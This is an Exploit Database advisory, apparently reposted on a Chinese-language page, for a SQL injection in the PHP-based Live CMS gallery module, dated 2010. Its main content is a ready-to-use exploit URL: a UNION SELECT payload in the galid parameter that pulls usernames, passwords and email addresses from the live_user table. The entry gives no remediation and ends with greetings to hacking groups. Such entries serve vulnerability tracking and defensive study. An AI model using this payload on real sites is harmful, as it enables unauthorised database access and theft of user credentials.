Live CMS – SQL Injection

• Exploit Database
• 9 阅读

• 作者： ahwak2000
  日期： 2010-06-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13911/

• /*
  [-] Live CMS SQL Injection Vulnerability [-]
  ---Date : 2010-06-17
  ---Author : ahwak2000
  ---Email : z.u5[at]hotmail.com
  [-] Script Info [-]
  ---Home : http://live-space.ru
  ---Demo : http://demo.live-space.ru/index.php
  
  [-] Vulnerability [-]
  
  http://site.com/path//index.php?area=1&p=gallery&action=showimages&galid=[SQL INj]
  
  [-] eXploit [-]
  
  http://server/path/index.php?area=1&p=gallery&action=showimages&galid=1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),uname,pass,email) from live_user--
  
  
  [-] Greetz to [-]
  
  To All Friends in V4-team Forums And pc.pirate
  
  */